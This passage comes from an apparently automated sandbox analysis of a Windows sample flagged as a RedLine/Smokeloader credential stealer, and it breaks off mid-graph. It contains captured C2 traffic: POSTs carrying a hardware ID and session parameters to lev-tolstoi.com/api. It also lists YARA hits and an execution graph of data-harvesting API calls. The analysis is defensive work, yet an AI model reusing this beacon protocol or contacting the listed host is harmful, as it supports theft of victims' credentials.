                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Vb8N3xKsQKJNfsPjzFOWhomWOQGfr%2BQ7%2FBy69Eng97UfXhOxZ0ozVqB%2B2R0zj1Qjsw3FEIalSlkB8KYp37iAGedVz3Do7JmK7Kyu40RRIJkOwfJK0qbOLHT8qR%2FB0teoKc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15dc3d2d4358-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=63904&min_rtt=24347&rtt_var=35103&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2143&delivery_rate=119932&cwnd=206&unsent_bytes=0&cid=b416c2a74d3897da&ts=491&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:46 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-02 19:16:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            7192.168.2.749708172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:47 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=KR9OPG0Z12N8NXIBQ
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 1125
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:47 UTC1125OUTData Raw: 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44 0d 0a 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 52 39 4f 50 47 30 5a 31 32 4e 38 4e 58 49 42 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33
                                                                                                                                                                                                                                            Data Ascii: --KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="hwid"1CAF9CB3F3F835CB88B9F97B60ED618D--KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="pid"1--KR9OPG0Z12N8NXIBQContent-Disposition: form-data; name="lid"HpOoIh--2a727a03
                                                                                                                                                                                                                                            2025-01-02 19:16:47 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:47 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=h3179cc41vobqol01eb8u15en6; expires=Mon, 28 Apr 2025 13:03:26 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wi9V6ISJ4RLyUHnNT0aNCdbJts5xdVjnjJY5PbELRl9uO9yagusheP8c9EZlekMYUhJ8HbGKcsn6pgCCWwbcZukJmDvs3zQR025FtTzAxcVxzvNKdwUHWjYyxolbCRlY46I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15e2ee78de92-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=9783&min_rtt=2104&rtt_var=5544&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2040&delivery_rate=1387832&cwnd=245&unsent_bytes=0&cid=854edcfe7da37e93&ts=507&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:47 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                            2025-01-02 19:16:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            8192.168.2.749714172.67.157.2544434048C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-02 19:16:48 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 121
                                                                                                                                                                                                                                            Host: lev-tolstoi.com
                                                                                                                                                                                                                                            2025-01-02 19:16:48 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 32 61 37 32 37 61 30 33 32 63 34 64 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 31 43 41 46 39 43 42 33 46 33 46 38 33 35 43 42 38 38 42 39 46 39 37 42 36 30 45 44 36 31 38 44
                                                                                                                                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--2a727a032c4d&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=1CAF9CB3F3F835CB88B9F97B60ED618D
                                                                                                                                                                                                                                            2025-01-02 19:16:49 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 02 Jan 2025 19:16:48 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=om4r0hpktndkbufg26flom9l35; expires=Mon, 28 Apr 2025 13:03:27 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKGhi3H3HnV0AlRvkiY9hIuGfwYwZvbgN2oDkHHKwhKq6ckvI8NKkEHV8x4OuyuXJgnfHSOD9TcrKc7gx0VJZavsp%2FLTsCONB%2FzMFa9lIaguQWp9EB3ryJ0EMiRMC9pijkk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8fbd15ea5e144337-EWR
                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17093&min_rtt=14933&rtt_var=9920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1021&delivery_rate=90638&cwnd=222&unsent_bytes=0&cid=a763dfa023cdfa66&ts=867&x=0"
                                                                                                                                                                                                                                            2025-01-02 19:16:49 UTC54INData Raw: 33 30 0d 0a 66 64 45 47 56 67 38 65 68 2b 48 59 4a 72 78 5a 47 69 7a 54 37 78 67 58 42 51 4e 6d 43 51 54 47 4d 30 46 71 49 71 7a 66 47 59 63 6d 6a 41 3d 3d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 30fdEGVg8eh+HYJrxZGizT7xgXBQNmCQTGM0FqIqzfGYcmjA==
                                                                                                                                                                                                                                            2025-01-02 19:16:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:14:16:34
                                                                                                                                                                                                                                            Start date:02/01/2025
                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                                            File size:317'952 bytes
                                                                                                                                                                                                                                            MD5 hash:2EA329CF21FE95C260EA3B956B6FBB75
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329734149.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1608094313.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329889525.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1329634294.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1315198830.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1287375743.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1300615651.0000000000781000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1315667210.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1286771741.0000000000783000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1608123380.0000000000630000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                                                            Start time:14:16:48
                                                                                                                                                                                                                                            Start date:02/01/2025
                                                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 1856
                                                                                                                                                                                                                                            Imagebase:0x4f0000
                                                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                              Execution Coverage:15.9%
                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                              Signature Coverage:69.6%
                                                                                                                                                                                                                                              Total number of Nodes:481
                                                                                                                                                                                                                                              Total number of Limit Nodes:26
                                                                                                                                                                                                                                              execution_graph 8375 40d040 CoInitializeSecurity 8376 40ac40 8379 40ac70 8376->8379 8377 40afd7 8379->8377 8379->8379 8380 43ab10 8379->8380 8381 43ab52 8380->8381 8382 43ab24 8380->8382 8383 43ab40 RtlFreeHeap 8380->8383 8381->8377 8382->8383 8383->8381 8384 409dc1 8387 43e480 8384->8387 8386 409dd1 WSAStartup 8388 43cf41 8389 43cf40 8388->8389 8389->8388 8392 43cf4e 8389->8392 8395 43c7a0 LdrInitializeThunk 8389->8395 8391 43d0ce 8392->8391 8394 43c7a0 LdrInitializeThunk 8392->8394 8394->8391 8395->8392 8978 42ab41 8979 42ab40 8978->8979 8979->8978 8980 42ab4e 8979->8980 8982 43c7a0 LdrInitializeThunk 8979->8982 8982->8980 8931 432247 8932 407fa0 8931->8932 8933 432256 VariantInit 8932->8933 8934 4322ed 8933->8934 8396 4301ca 8397 4156e0 8396->8397 8398 4301cf CoSetProxyBlanket 8397->8398 8794 417c48 8795 417c70 8794->8795 8795->8795 8796 417cee 8795->8796 8804 43c7a0 LdrInitializeThunk 8795->8804 8800 417dae 8796->8800 8805 43c7a0 LdrInitializeThunk 8796->8805 8799 417f0e 8802 417e5e 8800->8802 8806 43c7a0 LdrInitializeThunk 8800->8806 8802->8799 8807 43c7a0 LdrInitializeThunk 8802->8807 8804->8796 8805->8800 8806->8802 8807->8799 8399 43cdc8 8401 43cdf0 8399->8401 8400 43cebe 8401->8400 8403 43c7a0 LdrInitializeThunk 8401->8403 8403->8400 8404 43c9d3 GetForegroundWindow 8405 43c9f0 8404->8405 8406 4228d0 8407 4228e0 8406->8407 8407->8407 8410 43ee50 8407->8410 8409 4229cf 8411 43ee70 8410->8411 8412 43efde 8411->8412 8414 43c7a0 LdrInitializeThunk 8411->8414 8412->8409 8414->8412 8415 440150 8416 44015f 8415->8416 8417 4402ce 8416->8417 8423 43c7a0 LdrInitializeThunk 8416->8423 8420 4404e6 8417->8420 8422 44041e 8417->8422 8424 43c7a0 LdrInitializeThunk 8417->8424 8419 43ab10 RtlFreeHeap 8419->8420 8422->8419 8423->8417 8424->8422 8958 41d2d7 8959 43ab10 RtlFreeHeap 8958->8959 8960 41d2e0 8959->8960 8911 4219d9 8912 43f030 LdrInitializeThunk 8911->8912 8913 4219fc 8912->8913 8983 426359 8987 42635c 8983->8987 8984 42660f 8985 42676e 8993 43c7a0 LdrInitializeThunk 8985->8993 8987->8984 8987->8985 8992 43c7a0 LdrInitializeThunk 8987->8992 8989 426825 8994 43c7a0 LdrInitializeThunk 8989->8994 8991 426873 8992->8985 8993->8989 8994->8991 8822 41b4e1 8823 43f030 LdrInitializeThunk 8822->8823 8824 41b4f4 8823->8824 8825 43f030 LdrInitializeThunk 8824->8825 8826 41b50a 8825->8826 8501 415a62 8502 43ec70 LdrInitializeThunk 8501->8502 8518 415a76 8502->8518 8503 415b61 8504 415b72 8505 43ab10 RtlFreeHeap 8504->8505 8517 415b7c 8505->8517 8507 4161f4 8508 43ec70 LdrInitializeThunk 8507->8508 8513 416204 8508->8513 8509 43ec70 LdrInitializeThunk 8514 416217 8509->8514 8512 43f030 LdrInitializeThunk 8512->8517 8513->8509 8516 415afe 8516->8503 8516->8504 8516->8507 8516->8513 8516->8517 8519 43c7a0 LdrInitializeThunk 8516->8519 8531 438910 8516->8531 8517->8503 8517->8507 8517->8512 8517->8513 8521 43c7a0 LdrInitializeThunk 8517->8521 8522 43ab60 8517->8522 8544 43f130 8517->8544 8550 43b030 8517->8550 8518->8503 8518->8504 8518->8516 8530 43c7a0 LdrInitializeThunk 8518->8530 8519->8516 8521->8517 8523 43ab90 8522->8523 8526 43abee 8523->8526 8558 43c7a0 LdrInitializeThunk 8523->8558 8524 43ae1d 8524->8517 8526->8524 8529 43acfe 8526->8529 8559 43c7a0 LdrInitializeThunk 8526->8559 8527 43ab10 RtlFreeHeap 8527->8524 8529->8527 8530->8516 8533 438920 8531->8533 8532 43c710 2 API calls 8532->8533 8533->8532 8540 438a00 8533->8540 8560 43c7a0 LdrInitializeThunk 8533->8560 8535 438d7b 8536 43ab10 RtlFreeHeap 8535->8536 8537 438d94 8536->8537 8537->8516 8538 43c710 2 API calls 8538->8540 8539 43c7a0 LdrInitializeThunk 8539->8540 8540->8535 8540->8538 8540->8539 8541 43ab10 RtlFreeHeap 8540->8541 8542 438da1 8540->8542 8541->8540 8543 43ab10 RtlFreeHeap 8542->8543 8543->8535 8545 43f150 8544->8545 8548 43f1de 8545->8548 8561 43c7a0 LdrInitializeThunk 8545->8561 8546 43f2be 8546->8517 8548->8546 8562 43c7a0 LdrInitializeThunk 8548->8562 8551 43b0c0 8550->8551 8552 43b042 8550->8552 8551->8517 8552->8551 8555 43b0be 8552->8555 8563 43c7a0 LdrInitializeThunk 8552->8563 8554 43b1be 8554->8551 8554->8554 8565 43c7a0 LdrInitializeThunk 8554->8565 8555->8554 8564 43c7a0 LdrInitializeThunk 8555->8564 8558->8526 8559->8529 8560->8533 8561->8548 8562->8546 8563->8555 8564->8554 8565->8551 8566 437ae0 8567 437aee 8566->8567 8570 437b81 8567->8570 8575 43c7a0 LdrInitializeThunk 8567->8575 8568 437c0a 8570->8568 8572 437c68 8570->8572 8574 43c7a0 LdrInitializeThunk 8570->8574 8572->8568 8576 43c7a0 LdrInitializeThunk 8572->8576 8574->8570 8575->8567 8576->8572 8808 433860 8809 433865 8808->8809 8810 433898 GetSystemMetrics GetSystemMetrics 8809->8810 8811 4338d7 8810->8811 8577 42d966 8578 42d9a0 8577->8578 8578->8578 8579 42da9e 8578->8579 8583 43c7a0 LdrInitializeThunk 8578->8583 8582 43c7a0 LdrInitializeThunk 8579->8582 8582->8579 8583->8579 8584 40e7e4 8585 409710 8584->8585 8586 40e7f0 CoUninitialize 8585->8586 8587 40e810 8586->8587 8588 40ebc3 CoUninitialize 8587->8588 8589 40ebe0 8588->8589 8935 40a264 8936 40a270 8935->8936 8937 40ac40 RtlFreeHeap 8936->8937 8938 40a28a 8937->8938 8939 40ac40 RtlFreeHeap 8938->8939 8940 40a2b6 8939->8940 8878 417967 8879 417980 8878->8879 8881 4179fe 8879->8881 8888 43c7a0 LdrInitializeThunk 8879->8888 8882 417abe 8881->8882 8889 43c7a0 LdrInitializeThunk 8881->8889 8884 417b6e 8882->8884 8890 43c7a0 LdrInitializeThunk 8882->8890 8891 43c7a0 LdrInitializeThunk 8884->8891 8887 417f54 8888->8881 8889->8882 8890->8884 8891->8887 8831 4318e4 8832 431910 SysAllocString 8831->8832 8834 431a76 8832->8834 8594 43d3f3 8595 43d410 8594->8595 8598 43c7a0 LdrInitializeThunk 8595->8598 8597 43d671 8598->8597 8835 42a4f2 8837 42a4f7 8835->8837 8836 42a54e 8837->8836 8840 43c7a0 LdrInitializeThunk 8837->8840 8839 42ac46 8840->8839 8750 40d072 8751 40d090 8750->8751 8754 437dd0 8751->8754 8753 40d0c9 8755 437e00 CoCreateInstance 8754->8755 8757 438563 8755->8757 8758 43808a SysAllocString 8755->8758 8760 438573 GetVolumeInformationW 8757->8760 8761 43810b 8758->8761 8767 43858e 8760->8767 8762 438553 SysFreeString 8761->8762 8763 438113 CoSetProxyBlanket 8761->8763 8762->8757 8764 438133 SysAllocString 8763->8764 8765 438549 8763->8765 8768 438200 8764->8768 8765->8762 8767->8753 8768->8768 8769 438216 SysAllocString 8768->8769 8771 438241 8769->8771 8770 438533 SysFreeString SysFreeString 8770->8765 8771->8770 8772 438529 8771->8772 8773 438285 VariantInit 8771->8773 8772->8770 8775 4382d0 8773->8775 8774 438518 VariantClear 8774->8772 8775->8774 8776 41a273 8777 41a27a 8776->8777 8780 41a6e2 8777->8780 8782 43c7a0 LdrInitializeThunk 8777->8782 8779 41a93a CryptUnprotectData 8779->8780 8781 41ab54 8779->8781 8780->8779 8780->8781 8782->8780 8995 43b370 8997 43b3c0 8995->8997 8996 43bb8e 9002 43b428 8997->9002 9003 43c7a0 LdrInitializeThunk 8997->9003 8999 43bb19 8999->8996 9004 43c7a0 LdrInitializeThunk 8999->9004 9001 43c7a0 LdrInitializeThunk 9001->9002 9002->8996 9002->8999 9002->9001 9002->9002 9003->9002 9004->8996 8841 40a8f4 8842 40a925 8841->8842 8843 43ab10 RtlFreeHeap 8842->8843 8844 40a93a 8843->8844 8845 40a8f6 8846 40a8fe 8845->8846 8846->8846 8847 43ab10 RtlFreeHeap 8846->8847 8848 40a93a 8847->8848 8812 40d477 CoUninitialize 8813 40f4d2 8812->8813 8783 43aafb RtlAllocateHeap 8849 40d8fa CoUninitialize CoUninitialize 8784 43d57c 8785 43d590 8784->8785 8786 43d65e 8785->8786 8791 43c7a0 LdrInitializeThunk 8785->8791 8790 43c7a0 LdrInitializeThunk 8786->8790 8789 43d7df 8790->8789 8791->8786 8945 422a00 SHEmptyRecycleBinW 8850 424088 8851 42409d 8850->8851 8852 424160 8850->8852 8853 42430a 8850->8853 8854 4241b5 8850->8854 8851->8852 8851->8853 8851->8854 8853->8852 8858 43c7a0 LdrInitializeThunk 8853->8858 8854->8852 8857 43c7a0 LdrInitializeThunk 8854->8857 8857->8852 8858->8853 8859 41248a 8862 4124a4 8859->8862 8860 420da0 2 API calls 8861 40fc96 8860->8861 8862->8860 8862->8861 8924 42e993 VariantClear VariantInit 8925 42ea5e 8924->8925 9005 43f310 9006 43f330 9005->9006 9009 43f3c8 9006->9009 9011 43c7a0 LdrInitializeThunk 9006->9011 9007 43f4ae 9009->9007 9012 43c7a0 LdrInitializeThunk 9009->9012 9011->9009 9012->9007 8425 40de94 8426 40df30 8425->8426 8429 40dfae 8426->8429 8431 43c7a0 LdrInitializeThunk 8426->8431 8430 43c7a0 LdrInitializeThunk 8429->8430 8430->8429 8431->8429 8432 422b16 8433 422b30 8432->8433 8433->8433 8436 422ba0 8433->8436 8449 43ec70 8436->8449 8438 422b7b 8440 43ab10 RtlFreeHeap 8442 4232c1 8440->8442 8441 422bf9 8441->8438 8443 422cb5 8441->8443 8453 43c7a0 LdrInitializeThunk 8441->8453 8442->8438 8455 43c7a0 LdrInitializeThunk 8442->8455 8444 4232a4 8443->8444 8448 43ab10 RtlFreeHeap 8443->8448 8454 43c7a0 LdrInitializeThunk 8443->8454 8444->8440 8446 423396 8444->8446 8448->8443 8450 43ec80 8449->8450 8450->8450 8451 43edf8 8450->8451 8456 43c7a0 LdrInitializeThunk 8450->8456 8451->8441 8453->8441 8454->8443 8455->8442 8456->8451 8946 428a18 8948 428a2e 8946->8948 8949 428cb5 8946->8949 8947 43f030 LdrInitializeThunk 8947->8948 8948->8947 8948->8948 8948->8949 8950 43f130 LdrInitializeThunk 8948->8950 8951 43ec70 LdrInitializeThunk 8948->8951 8953 43c7a0 LdrInitializeThunk 8948->8953 8950->8948 8951->8948 8953->8948 9022 433b99 9023 433bc2 GetSystemMetrics GetSystemMetrics 9022->9023 9024 433c00 9023->9024 8457 40b71c 8458 40b737 8457->8458 8460 40b728 8457->8460 8458->8460 8461 43c710 8458->8461 8462 43c728 8461->8462 8463 43c740 8461->8463 8464 43c788 8461->8464 8465 43c754 8461->8465 8462->8463 8462->8464 8467 43c745 RtlReAllocateHeap 8463->8467 8466 43ab10 RtlFreeHeap 8464->8466 8465->8460 8466->8465 8467->8465 8468 42cb9f 8470 42cbc3 8468->8470 8469 42cc7b FreeLibrary 8476 43e480 8469->8476 8470->8469 8470->8470 8472 42cc9e GetComputerNameExA 8473 42cd00 GetComputerNameExA 8472->8473 8475 42ce30 8473->8475 8477 409c1e 8478 409c40 8477->8478 8478->8478 8479 409c9e LoadLibraryExW 8478->8479 8480 409caf 8479->8480 8481 409d7e LoadLibraryExW 8480->8481 8482 409d8f 8481->8482 8488 4087a0 8490 4087af 8488->8490 8489 408962 ExitProcess 8490->8489 8491 4087c4 GetCurrentProcessId GetCurrentThreadId 8490->8491 8492 40895d 8490->8492 8493 4087e7 SHGetSpecialFolderPathW GetForegroundWindow 8491->8493 8492->8489 8495 408914 8493->8495 8495->8492 8499 40d000 CoInitializeEx 8495->8499 8500 4323a2 CoSetProxyBlanket 8954 416220 8955 416240 8954->8955 8956 43ec70 LdrInitializeThunk 8955->8956 8957 41636d 8956->8957 9013 42f323 9014 42f326 9013->9014 9015 42f327 SysAllocString 9013->9015 9014->9015 9016 42f543 9015->9016 8926 40e1a2 8927 40e1c0 8926->8927 8927->8927 8928 40e23e 8927->8928 8930 43c7a0 LdrInitializeThunk 8927->8930 8930->8928 8590 42d1a4 8591 42d1d0 8590->8591 8591->8591 8592 42d624 GetPhysicallyInstalledSystemMemory 8591->8592 8593 42d64c 8592->8593 8593->8593 9025 4293a4 9026 4293c0 9025->9026 9027 43ec70 LdrInitializeThunk 9026->9027 9030 4294ea 9027->9030 9028 43f030 LdrInitializeThunk 9028->9030 9029 43f130 LdrInitializeThunk 9029->9030 9030->9028 9030->9029 9031 4295a8 9030->9031 9034 43c7a0 LdrInitializeThunk 9031->9034 9033 42998b 9034->9033 8814 40e430 8815 40e450 8814->8815 8817 40e4ce 8815->8817 8820 43c7a0 LdrInitializeThunk 8815->8820 8821 43c7a0 LdrInitializeThunk 8817->8821 8819 40f4eb 8820->8817 8821->8819 8599 40e5b1 8600 40e5c1 8599->8600 8625 424950 8600->8625 8602 40e5c7 8634 4250d0 8602->8634 8604 40e5e7 8653 4253c0 8604->8653 8606 40e607 8674 4275c0 8606->8674 8610 40e639 8692 42a2c0 8610->8692 8612 40e642 8613 424950 3 API calls 8612->8613 8614 40e6a6 8613->8614 8615 4250d0 2 API calls 8614->8615 8616 40e6c6 8615->8616 8617 4253c0 2 API calls 8616->8617 8618 40e6e6 8617->8618 8619 4275c0 2 API calls 8618->8619 8620 40e70f 8619->8620 8621 4278a0 2 API calls 8620->8621 8622 40e718 8621->8622 8623 42a2c0 LdrInitializeThunk 8622->8623 8624 40e721 8623->8624 8629 4249e0 8625->8629 8626 424ad5 8626->8602 8627 422ba0 2 API calls 8627->8629 8628 43ee50 LdrInitializeThunk 8628->8629 8629->8626 8629->8627 8629->8628 8629->8629 8631 424e04 8629->8631 8630 424f31 GetLogicalDrives 8632 43ee50 LdrInitializeThunk 8630->8632 8631->8630 8631->8631 8633 424f46 8632->8633 8633->8633 8637 425160 8634->8637 8636 425262 8702 420da0 8636->8702 8637->8636 8639 425521 8637->8639 8640 42532e 8637->8640 8706 43f960 8637->8706 8714 43f640 8639->8714 8640->8604 8644 43f4f0 LdrInitializeThunk 8645 425586 8644->8645 8645->8644 8646 426190 8645->8646 8649 42633d 8645->8649 8728 43c7a0 LdrInitializeThunk 8646->8728 8648 42660f 8648->8604 8649->8648 8650 42676e 8649->8650 8726 43c7a0 LdrInitializeThunk 8649->8726 8727 43c7a0 LdrInitializeThunk 8650->8727 8654 4253ce 8653->8654 8655 43f4f0 LdrInitializeThunk 8654->8655 8660 42534f 8655->8660 8656 425262 8661 420da0 2 API calls 